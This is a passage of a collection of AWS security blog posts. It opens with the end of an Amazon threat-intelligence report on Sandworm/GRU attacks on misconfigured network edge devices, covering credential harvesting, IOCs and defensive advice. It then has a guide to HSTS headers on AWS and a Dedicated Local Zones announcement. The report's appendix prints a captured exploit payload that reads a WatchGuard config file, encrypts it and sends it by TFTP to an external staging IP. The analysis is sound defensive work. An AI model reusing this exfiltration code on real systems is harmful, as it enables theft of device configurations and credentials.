Targeting the “low-hanging fruit” of likely misconfigured customer devices with exposed management interfaces achieves the same strategic objectives: persistent access to critical infrastructure networks and credential harvesting for accessing victim organizations’ online services. The threat actor’s shift in operational tempo represents a concerning evolution: while customer misconfiguration targeting has been ongoing since at least 2022, the actor maintained sustained focus on this activity in 2025 while reducing investment in zero-day and N-day exploitation. The actor accomplishes this while significantly reducing the risk of exposing their operations through more detectable vulnerability exploitation activity.

Credential harvesting operations

While we did not directly observe the mechanism used to extract victim organizations’ credentials, multiple indicators point to packet capture and traffic analysis as the primary collection method:

  1. Temporal analysis: Time gap between device compromise and authentication attempts against victim services suggests passive collection rather than active credential theft
  2. Credential type: Use of victim organization credentials (not device credentials) for accessing online services indicates interception of user authentication traffic
  3. Known tradecraft: Sandworm operations consistently involve network traffic interception capabilities
  4. Strategic positioning: Targeting of customer network edge devices specifically positions the actor to intercept credentials in transit

Infrastructure targeting

Compromise of infrastructure hosted on AWS: Amazon’s telemetry reveals coordinated operations against customer network edge devices hosted on AWS. This was not due to a weakness in AWS; these appear to be customer misconfigured devices. Network connection analysis shows actor-controlled IP addresses establishing persistent connections to compromised EC2 instances operating customers’ network appliance software. Analysis revealed persistent connections consistent with interactive access and data retrieval across multiple affected instances.

Credential replay operations: Beyond direct victim infrastructure compromise, we observed systematic credential replay attacks against victim organizations’ online services. In observed instances, the actor compromised customer network edge devices hosted on AWS, then subsequently attempted authentication using credentials associated with the victim organization’s domain against their online services. While these specific attempts were unsuccessful, the pattern of device compromise followed by authentication attempts using victim credentials supports our assessment that the actor harvests credentials from compromised customer network infrastructure for replay against target organizations’ online services. Actor infrastructure accessed victims’ authentication endpoints for multiple organizations across critical sectors through 2025, including:

  • Energy sector: Electric utility organizations, energy providers, and managed security service providers specializing in energy sector clients
  • Technology/cloud services: Collaboration platforms, source code repositories
  • Telecommunications: Telecom providers across multiple regions

Geographic distribution: The targeting demonstrates global reach:

  • North America
  • Europe (Western and Eastern)
  • Middle East

The targeting demonstrates sustained focus on the energy sector supply chain, including both direct operators and third-party service providers with access to critical infrastructure networks.

Campaign flow:

  1. Compromise customer network edge device hosted on AWS.
  2. Leverage native packet capture capability.
  3. Harvest credentials from intercepted traffic.
  4. Replay credentials against victim organizations’ online services and infrastructure.
  5. Establish persistent access for lateral movement.

Infrastructure overlap with “Curly COMrades”

Amazon Threat Intelligence identified threat actor infrastructure overlap with a group that Bitdefender tracks as “Curly COMrades.” We assess these may represent complementary operations within a broader GRU campaign:

  • Bitdefender’s reporting: Post-compromise host-based tradecraft (Hyper-V abuse for EDR evasion, custom implants CurlyShell/CurlCat)
  • Amazon’s telemetry: Initial access vectors and cloud pivot methodology

This potential operational division, where one cluster focuses on network access and initial compromise while another handles host-based persistence and evasion, aligns with GRU operational patterns of specialized subclusters supporting broader campaign objectives.

Amazon’s response and disruption

Amazon remains committed to helping protect customers and the broader internet ecosystem by actively investigating and disrupting sophisticated threat actors.

Immediate response actions:

  • Identified and notified affected customers of compromised network appliance resources
  • Enabled immediate remediation of compromised EC2 instances
  • Shared intelligence with industry partners and affected vendors
  • Reported observations to network appliance vendors to help support security investigations

Disruption impact: Through coordinated efforts, since our discovery of this activity, we have disrupted active threat actor operations and reduced the attack surface available to this threat activity subcluster. We will continue working with the security community to share intelligence and collectively defend against state-sponsored threats targeting critical infrastructure.

Defending your organization

Immediate priority actions for 2026

Organizations should proactively monitor for evidence of this activity pattern:

1. Network edge device audit

  • Audit all network edge devices for unexpected packet capture files or utilities.
  • Review device configurations for exposed management interfaces.
  • Implement network segmentation to isolate management interfaces.
  • Enforce strong authentication (eliminate default credentials, implement MFA).

2. Credential replay detection

  • Review authentication logs for credential reuse between network device management interfaces and online services.
  • Monitor for authentication attempts from unexpected geographic locations.
  • Implement anomaly detection for authentication patterns across your organization’s online services.
  • Review extended time windows following any suspected device compromise for delayed credential replay attempts.

3. Access monitoring

  • Monitor for interactive sessions to router/appliance administration portals from unexpected source IPs.
  • Examine whether network device management interfaces are inadvertently exposed to the internet.
  • Audit for plain text protocol usage (Telnet, HTTP, unencrypted SNMP) that could expose credentials.

4. IOC review
Energy sector organizations and critical infrastructure operators should prioritize reviewing access logs for authentication attempts from the IOCs listed below.

AWS-specific recommendations

For AWS environments, implement these protective measures:

Identity and access management:

  • Manage access to AWS resources and APIs using identity federation with an identity provider and IAM roles whenever possible.
  • For more information, see Creating IAM policies in the IAM User Guide.

Network security:

  • Implement the least permissive rules for your security groups.
  • Isolate management interfaces in private subnets with bastion host access.
  • Enable VPC Flow Logs for network traffic analysis.

Vulnerability management:

  • Use Amazon Inspector to automatically discover and scan Amazon EC2 instances for software vulnerabilities and unintended network exposure.
  • For more information, see the Amazon Inspector User Guide.
  • Regularly patch, update, and secure the operating system and applications on your instances.

Detection and monitoring:

  • Enable AWS CloudTrail for API activity monitoring.
  • Configure Amazon GuardDuty for threat detection.
  • Review authentication logs for credential replay patterns.

Indicators of Compromise (IOCs)

IOC Value IOC Type First Seen Last Seen Annotation
91.99.25[.]54 IPv4 2025-07-02 Present Compromised legitimate server used to proxy threat actor traffic
185.66.141[.]145 IPv4 2025-01-10 2025-08-22 Compromised legitimate server used to proxy threat actor traffic
51.91.101[.]177 IPv4 2024-02-01 2024-08-28 Compromised legitimate server used to proxy threat actor traffic
212.47.226[.]64 IPv4 2024-10-10 2024-11-06 Compromised legitimate server used to proxy threat actor traffic
213.152.3[.]110 IPv4 2023-05-31 2024-09-23 Compromised legitimate server used to proxy threat actor traffic
145.239.195[.]220 IPv4 2021-08-12 2023-05-29 Compromised legitimate server used to proxy threat actor traffic
103.11.190[.]99 IPv4 2021-10-21 2023-04-02 Compromised legitimate staging server used to exfiltrate WatchGuard configuration files
217.153.191[.]190 IPv4 2023-06-10 2025-12-08 Long-term infrastructure used for reconnaissance and targeting

Note: All identified IPs are compromised legitimate servers that may serve multiple purposes for the actor or continue legitimate operations. Organizations should investigate context around any matches rather than automatically blocking. We observed these IPs specifically accessing router management interfaces and attempting authentication to online services during the timeframes listed.
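Because the IOCs above are published defanged (with "[.]" in place of dots), matching them against raw access logs requires refanging them first. The sketch below, with hypothetical log lines, illustrates the pattern.

```python
# Illustrative sketch: refang defanged IOCs and search raw log lines for them.
def refang(ioc: str) -> str:
    """Convert a defanged indicator like 91.99.25[.]54 to its literal form."""
    return ioc.replace("[.]", ".")

iocs = {refang(ip) for ip in ["91.99.25[.]54", "217.153.191[.]190"]}

def matching_lines(log_lines, iocs):
    """Return log lines that mention any of the given indicators."""
    return [line for line in log_lines if any(ioc in line for ioc in iocs)]

# Hypothetical access-log lines for demonstration.
hits = matching_lines(
    ['217.153.191.190 - - "GET /admin HTTP/1.1" 401',
     '198.51.100.9 - - "GET / HTTP/1.1" 200'],
    iocs,
)
```

Per the note above, treat any match as a starting point for investigation rather than grounds for automatic blocking, since these servers may also carry legitimate traffic.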

Technical appendix: CVE-2022-26318 Exploit payload

The following payload was captured by Amazon MadPot during the 2022 WatchGuard exploitation campaign:

from cryptography.fernet import Fernet
import subprocess
import os

key = 'uVrZfUGeecCBHhFmn1Zu6ctIQTwkFiW4LGCmVcd6Yrk='

with open('/etc/wg/config.xml', 'rb') as config_file:
    buf = config_file.read()

fernet = Fernet(key)
enc_buf = fernet.encrypt(buf)

with open('/tmp/enc_config.xml', 'wb') as encrypted_config:
    encrypted_config.write(enc_buf)

subprocess.check_output(['tftp', '-p', '-l', '/tmp/enc_config.xml', '-r',
                         '[REDACTED].bin', '103.11.190[.]99'])
os.remove('/tmp/enc_config.xml')

This payload demonstrates the actor’s methodology: encrypt stolen configuration data, exfiltrate via TFTP to compromised staging infrastructure, and remove forensic evidence.



CJ Moses

CJ Moses is the CISO of Amazon Integrated Security. In his role, CJ leads security engineering and operations across Amazon. His mission is to enable Amazon businesses by making the benefits of security the path of least resistance. CJ joined Amazon in December 2007, holding various roles including Consumer CISO and, most recently, AWS CISO, before becoming CISO of Amazon Integrated Security in September 2023.

Prior to joining Amazon, CJ led the technical analysis of computer and network intrusion efforts at the Federal Bureau of Investigation’s Cyber Division. CJ also served as a Special Agent with the Air Force Office of Special Investigations (AFOSI). CJ led several computer intrusion investigations seen as foundational to the security industry today.

CJ holds degrees in Computer Science and Criminal Justice, and is an active SRO GT America GT2 race car driver.

Implementing HTTP Strict Transport Security (HSTS) across AWS services

12 December 2025 at 22:53

Modern web applications built on Amazon Web Services (AWS) often span multiple services to deliver scalable, performant solutions. However, customers encounter challenges when implementing a cohesive HTTP Strict Transport Security (HSTS) strategy across these distributed architectures.

Customers face fragmented security implementation challenges because different AWS services require distinct approaches to HSTS configuration, leading to inconsistent security postures. Applications using Amazon API Gateway for APIs, Amazon CloudFront for content delivery, and Application Load Balancers for web traffic often lack unified HSTS policies in complex multi-service environments. Security scanners flag missing HSTS headers, but remediation guidance is scattered across service-specific documentation, causing security compliance gaps.

HSTS is a web security policy mechanism that protects websites against protocol downgrade attacks and cookie hijacking. When properly implemented, HSTS instructs browsers to interact with applications exclusively through HTTPS connections, providing critical protection against man-in-the-middle issues.

This post provides a comprehensive approach to implementing HSTS across key AWS services that form the foundation of modern cloud applications:

  1. Amazon API Gateway: Secure REST and HTTP APIs with centralized header management
  2. Application Load Balancer: Infrastructure-level HSTS enforcement for web applications
  3. Amazon CloudFront: Edge-based security header delivery for global content

By following the implementation steps in this post, you can establish a unified HSTS strategy that aligns with AWS Well-Architected Framework security principles while maintaining optimal application performance.

Understanding HSTS security and its benefits

HTTP Strict Transport Security is a web security policy mechanism that helps protect websites against protocol downgrade attacks and cookie hijacking. When a web server declares HSTS policy through the Strict-Transport-Security header, compliant browsers automatically convert HTTP requests to HTTPS for the specified domain. This enforcement occurs at the browser level, providing protection even before the initial request reaches your infrastructure.

HSTS enforcement applies specifically to web browser clients. Most programmatic clients (such as SDKs, command line tools, or application-to-application communication) don’t enforce HSTS policies. For comprehensive security, configure your applications and infrastructure to only use HTTPS connections regardless of client type rather than relying solely on HSTS for protocol enforcement.

HTTP to HTTPS redirection enforcement on the server ensures future requests reach your applications over encrypted connections. However, it leaves a security gap during the initial browser request. Understanding this gap helps explain why client-side HSTS serves as an essential security layer in modern web applications.

For example, when users access web applications, the typical flow with redirects configured is as follows:

  1. User enters example.com in their browser.
  2. Browser sends an HTTP request to http://example.com.
  3. Server responds with HTTP 301/302 redirect to https://example.com.
  4. Browser follows the redirect and establishes an HTTPS connection.

The initial HTTP request in step 2 creates an opportunity for protocol downgrade issues. An unauthorized party positioned between the user and your infrastructure can intercept this request and respond with content that appears legitimate while maintaining an insecure connection. This technique, known as SSL stripping, can occur even when your server-side AWS infrastructure is properly configured with HTTPS redirects.

HSTS addresses this security gap by moving security enforcement to the browser level. After a browser receives an HSTS policy, it automatically converts HTTP requests to HTTPS before sending them over the network:

  1. User enters example.com in browser.
  2. Browser automatically converts to HTTPS due to stored HSTS policy.
  3. Browser sends HTTPS request directly to https://example.com.
  4. Because no initial HTTP request is sent, there is no opportunity for interception.
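The browser-side enforcement in the steps above can be sketched with a toy model. This is illustrative only; real browsers persist HSTS policies with an expiry derived from max-age and also honor includeSubDomains:

```python
# Toy model of browser-side HSTS enforcement (illustrative only; a real
# browser persists policies with expiry and subdomain handling).

hsts_policies = set()  # hosts for which an HSTS policy has been stored

def record_hsts(host: str) -> None:
    """Called when a response carries a Strict-Transport-Security header."""
    hsts_policies.add(host)

def rewrite_url(url: str) -> str:
    """Upgrade http:// to https:// before any request leaves the machine."""
    if url.startswith("http://"):
        rest = url[len("http://"):]
        host = rest.split("/")[0]
        if host in hsts_policies:
            return "https://" + rest
    return url

record_hsts("example.com")
print(rewrite_url("http://example.com/login"))   # upgraded to HTTPS
print(rewrite_url("http://other.example.net/"))  # no stored policy: unchanged
```

The key point the model captures is that the upgrade happens before any network traffic is generated, which is exactly what closes the SSL-stripping window.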

This browser-level enforcement provides protection that complements your AWS infrastructure security configurations, creating defense in depth against protocol downgrade issues.

Although current browsers warn about insecure connections, HSTS provides programmatic enforcement. This prevents unauthorized parties from exploiting the security gap because they can’t forge valid HTTPS certificates for protected domains.

The security benefits of HSTS extend beyond simple protocol enforcement. After the HSTS policy is established in the browser, it helps prevent protocol downgrade issues and mitigates man-in-the-middle issues by preventing unauthorized parties from intercepting communications. It also helps protect sessions against credential theft and unintended access. Because HSTS requires valid HTTPS connections, it additionally removes the option for users to bypass certificate warnings.

This post focuses exclusively on implementing the HTTP Strict-Transport-Security header. Although the examples include additional security headers for completeness, detailed configuration of those headers is beyond the scope of this post.

Key use cases for HSTS implementation

HSTS protects scenarios that HTTP redirects miss. For example, when legacy systems serve mixed content, or when SSO flows redirect users between providers, HSTS keeps connections encrypted throughout.

Applications serving both modern HTTPS content and legacy HTTP resources face protocol downgrade risks. When users access example.com/app that loads resources from legacy.example.com, HSTS prevents browsers from making initial HTTP requests to any subdomain, eliminating the vulnerability window during resource loading.

SSO implementations redirecting users between identity providers and applications create multiple HTTP request opportunities. Due to HSTS, authentication tokens and session data remain encrypted throughout the entire SSO flow, preventing credential interception during provider redirects.

Microservices architectures using API Gateway often involve service-to-service communication and client redirects. HSTS protects API endpoints from protocol downgrade during initial client connections, which means that API keys and authentication headers are not transmitted over HTTP.

Applications using CloudFront with multiple origin servers face security challenges when origins change or fail over. HSTS prevents browsers from falling back to HTTP when accessing cached content or during origin failover scenarios, maintaining encryption even during infrastructure changes.

From an AWS Well-Architected perspective, implementing HSTS demonstrates adherence to the defense in depth principle by adding an additional layer of security at the application protocol level. This approach complements other AWS security services and features, creating a comprehensive security posture that helps to protect data both in transit and at rest.

Implementing HSTS with Amazon API Gateway

Amazon API Gateway has no built-in setting to enable HSTS for API resources, but there are several ways to configure HSTS headers in HTTP APIs and REST APIs.
For HTTP APIs, you can configure response parameter mapping to set HSTS headers whether the API is invoked through the default endpoint or a custom domain.

To configure response parameter mapping:

  1. Navigate to your desired HTTP API’s route configuration in the API Gateway console.
  2. Access the route’s integration settings on the Manage integrations tab.

Figure 1: Integration settings of the HTTP API

  3. To configure parameter mapping, under Response key, enter 200.
  4. Under Modification type, select Append in the dropdown menu.
  5. Under Parameter to modify, enter header.Strict-Transport-Security.
  6. Under Value, enter max-age=31536000; includeSubDomains; preload.

Figure 2: Parameter mapping for the HTTP API integration

REST APIs in Amazon API Gateway offer more granular control over HSTS implementation through both proxy and non-proxy integration patterns.

For proxy integrations, the backend service assumes responsibility for HSTS header generation. For example, an AWS Lambda proxy integration must return the HSTS headers in its response as shown in the following code example:

import json

def lambda_handler(event, context):
    return {
        'statusCode': 200,
        'headers': {
            'Strict-Transport-Security': 'max-age=31536000; includeSubDomains; preload'
        },
        'body': json.dumps('Secure response with HSTS headers')
    }

For non-proxy integrations, the HSTS headers must be returned by the REST API itself, using one of two methods: mapping templates or the method response configuration.

In the mapping template method, you use a Velocity Template Language (VTL) mapping template to generate the HSTS header dynamically. To implement this method:

  1. Navigate to the desired REST API and select the method for the desired resource.
  2. On the Integration response tab, use the following mapping template to set the response headers:

$input.json("$")
#set($newValue = "$input.params().header.get('Host')")
#set($context.responseOverride.header.Strict-Transport-Security = "max-age=31536000; includeSubDomains; preload")

Figure 3: Adding a mapping template to the integration response of the REST API

The Method response tab provides declarative configuration through explicit header mapping. To implement this method:

  1. Navigate to your desired REST API and select the method for the desired resource.
  2. Choose Method response and, under Header name, add the HSTS header strict-transport-security.

Figure 4: Method response of the REST API

  3. Choose Integration response and, under Header mappings, enter the HSTS header strict-transport-security. Add the mapping value for the header as max-age=31536000; includeSubDomains; preload.

Figure 5: Integration response of the REST API

To test and validate, verify the HSTS implementation for both HTTP APIs and REST APIs by using curl with response headers included:

curl -i https://your-api-gateway-url.execute-api.region.amazonaws.com/stage/resource

The expected response should include:

HTTP/2 200
date: Tue, 20 Sep 2025 16:34:35 GMT
content-type: application/json
content-length: 3
x-amzn-requestid: 76543210-9aaa-4bbb-accc-987654321012
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-amz-apigw-id: ABCDEFGHIJKLMNO
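Beyond eyeballing the curl output, you can check the header value programmatically. The following sketch (not an official AWS tool) parses a Strict-Transport-Security value into its directives; directive names are case-insensitive per RFC 6797:

```python
# Minimal parser for a Strict-Transport-Security header value
# (illustrative; directive names are case-insensitive per RFC 6797).

def parse_hsts(value: str) -> dict:
    policy = {"max_age": None, "include_subdomains": False, "preload": False}
    for directive in (d.strip() for d in value.split(";") if d.strip()):
        name, _, arg = directive.partition("=")
        name = name.strip().lower()
        if name == "max-age":
            policy["max_age"] = int(arg.strip())
        elif name == "includesubdomains":
            policy["include_subdomains"] = True
        elif name == "preload":
            policy["preload"] = True
    return policy

print(parse_hsts("max-age=31536000; includeSubDomains; preload"))
```

A check like this is easy to drop into a deployment pipeline so that a missing or weakened header fails the build instead of surfacing in a security scan later.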

Implementing HSTS with AWS Application Load Balancers

Application Load Balancers now provide built-in support for HTTP response header modification, including HSTS headers. This lets you enforce consistent security policies across all your services from a single point, reducing development effort and ensuring uniform protection regardless of which backend technologies you’re using.

Prerequisites and infrastructure requirements

Before implementing HSTS with load balancers, ensure your infrastructure meets these requirements:

  • Functional HTTPS listener – The ALB must have a correctly configured HTTPS listener.
  • Valid certificates – The HTTPS listener must use a valid TLS certificate chain, provisioned and validated in AWS Certificate Manager.
  • Header modification enabled – The response header modification feature must be enabled on the listener, because it is turned off by default.

Configuration

Application Load Balancers support direct HSTS header injection through the response header modification feature. This approach provides centralized security policy enforcement without requiring individual application configuration.

To enable HTTP header modification for your Application Load Balancer:

  1. Open the Amazon Elastic Compute Cloud (Amazon EC2) console and navigate to Load Balancers.
  2. Select your Application Load Balancer.
  3. On the Listeners and rules tab, select the HTTPS listener.
  4. On the Attributes tab, choose Edit.
    Figure 6: ALB HTTPS listener Attributes configuration

  5. Expand the Add response headers section.
  6. Select Add HTTP Strict Transport Security (HSTS) header.
  7. To configure the header value, enter max-age=31536000; includeSubDomains; preload.
  8. Choose Save changes.
Figure 7: Add response headers in attributes configuration of the ALB HTTPS listener

Header modification behavior

When ALB header modification is enabled:

  • Header addition – If the backend response doesn’t include the specified header, ALB adds it with the configured value
  • Header override – If the backend response includes the header, ALB replaces the existing value with the configured value
  • Centralized control – Responses from the load balancer include the configured security headers, ensuring consistent policy enforcement
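The add-or-override behavior described above can be modeled in a few lines. This is an illustrative simulation of the documented semantics, not ALB code:

```python
# Illustrative model of ALB response header modification: the configured
# header is added when absent and replaces any backend-supplied value.

HSTS = "max-age=31536000; includeSubDomains; preload"

def apply_alb_header_modification(backend_headers: dict) -> dict:
    headers = dict(backend_headers)      # leave the backend response untouched
    headers["strict-transport-security"] = HSTS  # add or override
    return headers

# Backend sent no HSTS header: ALB adds it.
print(apply_alb_header_modification({"content-type": "text/html"}))
# Backend sent a weaker value: ALB replaces it with the configured one.
print(apply_alb_header_modification({"strict-transport-security": "max-age=60"}))
```

The practical consequence of the override behavior is that a misconfigured or legacy backend cannot weaken the policy you set at the load balancer.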

To test and validate, use the following command:

curl -I https://my-loadbalancer-1234567890.us-west-2.elb.amazonaws.com

The following code example shows the expected response headers:

HTTP/2 200
date: Tue, 23 Sep 2025 16:34:35 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload

Header value constraints:

  • Maximum header value size – 1 KB
  • Supported characters – Alphanumeric (a-z, A-Z, 0-9) and special characters (_ :;.,/’?!(){}[]@<>=-+*#&`|~^%)
  • Empty values revert to default behavior (no header modification)
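A hypothetical pre-flight check for these constraints might look like the following. The character set in the regex is transcribed from the list above; verify it against the current ALB documentation before relying on it:

```python
import re

# Hypothetical validator for the ALB header value constraints listed above:
# at most 1 KB, limited to alphanumerics and the documented special characters.
ALLOWED = re.compile(r"^[A-Za-z0-9 _:;.,/'?!(){}\[\]@<>=\-+*#&`|~^%]*$")

def valid_alb_header_value(value: str) -> bool:
    return len(value.encode()) <= 1024 and bool(ALLOWED.match(value))

print(valid_alb_header_value("max-age=31536000; includeSubDomains; preload"))  # True
print(valid_alb_header_value("bad\nvalue"))                                    # False
```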

When implementing header modifications, there are several operational considerations to keep in mind. Header modification must be explicitly enabled on each listener where you want the functionality to work. Once enabled, any changes you configure will apply to all responses that come from the load balancer, affecting every request processed through that listener. Application Load Balancer performs basic input validation on the headers you configure, but it has limited capability for header-specific validation, so you should ensure your header configurations follow proper formatting and standards.

This built-in Application Load Balancer capability significantly simplifies HSTS implementation by eliminating the need for backend application modifications while providing centralized security policy enforcement across your entire application infrastructure.

Implementing HSTS with Amazon CloudFront

Amazon CloudFront provides built-in support for HTTP security headers, including HSTS, through response headers policies. This feature enables centralized security header management at the CDN edge, providing consistent policy enforcement across cached and non-cached content.

Response headers policy configuration

You can use the CloudFront response headers policy feature to configure security headers that are automatically added to responses served by your distribution. You can use managed response headers policies that include predefined values for the most common HTTP security headers. Or, you can create a custom response header policy with custom security headers and values that you can add to the required CloudFront behavior.

To configure security headers:

  1. On the CloudFront console, navigate to Policies and then Response headers.
  2. Choose Create response headers policy.
  3. Configure policy settings:
    • Name – HSTS-Security-Policy
    • Description – HSTS and security headers for web applications
  4. Under Security headers, configure:
    • Strict Transport Security – Select
    • Max age – 31,536,000 seconds (1 year)
    • Preload – Select (optional)
    • IncludeSubDomains – Select (optional)
  5. Add additional security headers:
    • X-Content-Type-Options – Select
    • X-Frame-Options – Select Origin as SAMEORIGIN
    • Referrer-Policy – Select strict-origin-when-cross-origin
    • X-XSS-Protection – Select Enabled, and select Block
  6. Choose Create.
Figure 8: Configuring the response headers policy for the CloudFront distribution

To attach the policy to the distribution:

  1. Navigate to your CloudFront distribution.
  2. Select the Behaviors tab.
  3. Edit the default behavior (or create a new one).
  4. Under Response headers policy, select your created policy.
  5. Choose Save changes.
Figure 9: Selecting the response headers policy

Header override behavior:
CloudFront response headers policies provide origin override functionality that controls how headers are managed between the origin and CloudFront. When origin override is enabled, CloudFront will replace existing headers that come from the origin server. Conversely, when origin override is disabled, CloudFront will only add the policy-defined headers if those same headers are not already present in the origin response, preserving the original headers from the source.
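The origin override logic described above can be sketched as follows. This is an illustrative model of the documented semantics, not CloudFront code:

```python
# Illustrative model of CloudFront response headers policy semantics:
# with origin override enabled, the policy header always wins; with it
# disabled, an existing origin header is preserved.

def apply_policy_header(origin_headers: dict, name: str, value: str,
                        origin_override: bool) -> dict:
    headers = dict(origin_headers)
    if origin_override or name not in headers:
        headers[name] = value
    return headers

hsts = "max-age=31536000; includeSubDomains; preload"
origin = {"strict-transport-security": "max-age=60"}

# Override disabled: the origin's weaker value is preserved.
print(apply_policy_header(origin, "strict-transport-security", hsts, origin_override=False))
# Override enabled: the policy value replaces the origin's value.
print(apply_policy_header(origin, "strict-transport-security", hsts, origin_override=True))
```

If your origins might emit their own (possibly weaker) HSTS headers, enabling origin override is the safer choice for consistent policy enforcement at the edge.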

To test and validate, use the following command:

curl -I https://your-cloudfront-domain.cloudfront.net

The following code example shows the expected response headers:

HTTP/2 200 
date: Tue, 23 Sep 2025 16:34:35 GMT 
strict-transport-security: max-age=31536000; includeSubDomains; preload 
x-content-type-options: nosniff 
x-frame-options: SAMEORIGIN 
referrer-policy: strict-origin-when-cross-origin 
x-xss-protection: 1; mode=block 
x-cache: Hit from cloudfront

Using CloudFront has several advantages. It offers consistent header application across all content types and centralized security policy management. Edge-level enforcement reduces latency, and no origin server modifications are required. AWS edge locations offer global policy distribution.

Security considerations and best practices

Implementing HSTS requires careful consideration of several security implications and operational requirements.

The max-age directive determines how long browsers will enforce HTTPS-only access. The duration guidelines are as follows:

  • 300 seconds (5 minutes) – Safe for experimentation during initial testing phase.
  • 86,400 seconds (1 day) – For short-term commitment such as development environments.
  • 2,592,000 seconds (30 days) – For medium-term validation such as staging environments.
  • 31,536,000 seconds (1 year) – For long-term commitment such as production environments.

We recommend that you start with shorter max-age values during initial implementation and gradually increase them as you gain confidence in your HTTPS infrastructure stability.
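To make a staged rollout easier, a small helper (hypothetical, not part of any AWS SDK) can build the header value from the chosen settings, so only the max-age changes between stages:

```python
# Hypothetical helper that assembles a Strict-Transport-Security value
# from the rollout settings discussed above.

def build_hsts(max_age: int, include_subdomains: bool = False,
               preload: bool = False) -> str:
    parts = [f"max-age={max_age}"]
    if include_subdomains:
        parts.append("includeSubDomains")
    if preload:
        parts.append("preload")
    return "; ".join(parts)

print(build_hsts(300))  # initial testing phase
print(build_hsts(31536000, include_subdomains=True, preload=True))  # production
```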

The includeSubDomains directive extends HSTS enforcement to all subdomains. It offers several benefits, including comprehensive protection across the entire domain hierarchy, prevention of subdomain-based attacks, and simplified security policy management.

Requirements for using this directive include:

  • Subdomains should support HTTPS to use this directive effectively.
  • Subdomains should have valid SSL certificates.
  • You must maintain a consistent security policy across domain hierarchy.

Consider implementing HSTS preloading for maximum security coverage:

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload

Preloading benefits include protection for first-time visitors, browser-level enforcement before network requests, and maximizing security coverage.

The following are some preloading considerations:

  • It requires submission to browser preload lists.
  • It’s difficult to reverse because removal takes months.
  • It requires long-term commitment to HTTPS infrastructure.


Conclusion

Implementing HSTS across AWS services provides a robust foundation for securing web applications against protocol downgrade attacks and enabling encrypted communications. By using the built-in capabilities of API Gateway, CloudFront, and Application Load Balancers, organizations can create comprehensive security policies that align with AWS Well-Architected Framework principles.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Abhishek Avinash Agawane
Abhishek is a Security Consultant at Amazon Web Services with more than 8 years of industry experience. He helps organizations architect resilient, secure, and efficient cloud environments, guiding them through complex challenges and large-scale infrastructure transformations. He has helped numerous organizations enhance their cloud operations through targeted optimizations, robust architectures, and best-practice implementations.

Meet digital sovereignty needs with AWS Dedicated Local Zones expanded services

12 December 2025 at 18:05

At Amazon Web Services (AWS), we continue to invest in and deliver digital sovereignty solutions to help customers meet their most sensitive workload requirements. To address the regulatory and digital sovereignty needs of public sector and regulated industry customers, we launched AWS Dedicated Local Zones in 2023, with the Government Technology Agency of Singapore (GovTech Singapore) as our first customer.

Today, we’re excited to announce expanded service availability for Dedicated Local Zones, giving customers more choice and control without compromise. In addition to the data residency, sovereignty, and data isolation benefits they already enjoy, the expanded service list gives customers additional options for compute, storage, backup, and recovery.

Dedicated Local Zones are AWS infrastructure fully managed by AWS, built for exclusive use by a customer or community, and placed in a customer-specified location or data center. They help customers across the public sector and regulated industries meet security and compliance requirements for sensitive data and applications through a private infrastructure solution configured to meet their needs. Dedicated Local Zones can be operated by local AWS personnel and offer the same benefits of AWS Local Zones, such as elasticity, scalability, and pay-as-you-go pricing, with added security and governance features.

Since being launched, Dedicated Local Zones have supported a core set of compute, storage, database, containers, and other services and features for local processing. We continue to innovate and expand our offerings based on what we hear from customers to help meet their unique needs.

More choice and control without compromise

The following new services and capabilities deliver greater flexibility for customers to run their most critical workloads while maintaining strict data residency and sovereignty requirements.

New generation instance types

To support complex workloads in AI and high-performance computing, customers can now use newer generation instance types, including Amazon Elastic Compute Cloud (Amazon EC2) generation 7 with accelerated computing capabilities.

AWS storage options

AWS storage options provide two storage classes including Amazon Simple Storage Service (Amazon S3) Express One Zone, which offers high-performance storage for customers’ most frequently accessed data, and Amazon S3 One Zone-Infrequent Access, which is designed for data that is accessed less frequently and is ideal for backups.

Advanced block storage capabilities are delivered through Amazon Elastic Block Store (Amazon EBS) gp3 and io1 volumes, which customers can use to store data within a specific perimeter to support critical data isolation and residency requirements. By using the latest AWS general purpose SSD volumes (gp3), customers can provision performance independently of storage capacity with an up to 20% lower price per gigabyte than existing gp2 volumes. For intensive, latency-sensitive transactional workloads, such as enterprise databases, provisioned IOPS SSD (io1) volumes provide the necessary performance and reliability.

Backup and recovery capabilities

We have added backup and recovery capabilities through Amazon EBS Local Snapshots, which provides robust support for disaster recovery, data migration, and compliance. Customers can create backups within the same geographical boundary as EBS volumes, helping meet data isolation requirements. Customers can also create AWS Identity and Access Management (IAM) policies for their accounts to enable storing snapshots within the Dedicated Local Zone. To automate the creation and retention of local snapshots, customers can use Amazon Data Lifecycle Manager (DLM).

Customers can use local Amazon Machine Images (AMIs) to create and register AMIs while maintaining underlying local EBS snapshots within Dedicated Local Zones, helping achieve adherence to data residency requirements. By creating AMIs from EC2 instances or registering AMIs using locally stored snapshots, customers maintain complete control over their data’s geographical location.

Dedicated Local Zones meet the same high AWS security standards and sovereign-by-design principles that apply to AWS Regions and Local Zones. For instance, the AWS Nitro System provides the foundation with hardware- and software-level security. This is complemented by AWS Key Management Service (AWS KMS) and AWS Certificate Manager (ACM) for encryption management, Amazon Inspector, Amazon GuardDuty, and AWS Shield to help protect workloads, and AWS CloudTrail for audit logging of user and API activity across AWS accounts.

Continued innovation with GovTech Singapore

One of GovTech Singapore’s key focuses is on the nation’s digital government transformation and enhancing the public sector’s engineering capabilities. Our collaboration with GovTech Singapore involved configuring their Dedicated Local Zones with specific services and capabilities to support their workloads and meet stringent regulatory requirements. This architecture addresses data isolation and security requirements and ensures consistency and efficiency across Singapore Government cloud environments.

With the availability of the new AWS services with Dedicated Local Zones, government agencies can simplify operations and meet their digital sovereignty requirements more effectively. For instance, agencies can use Amazon Relational Database Service (Amazon RDS) to create new databases rapidly. Amazon RDS in Dedicated Local Zones helps simplify database management by automating tasks such as provisioning, configuring, backing up, and patching. This collaboration is just one example of how AWS innovates to meet customer needs and configures Dedicated Local Zones based on specific requirements.

Chua Khi Ann, Director of GovTech Singapore’s Government Digital Products division, who oversees the Cloud Programme, shared:
"The deployment of Dedicated Local Zones by our Government on Commercial Cloud (GCC) team, in collaboration with AWS, now enables Singapore government agencies to host systems with confidential data in the cloud. By leveraging cloud-native services like advanced storage and compute, we can achieve better availability, resilience, and security of our systems, while reducing operational costs compared to on-premises infrastructure."

Get started with Dedicated Local Zones

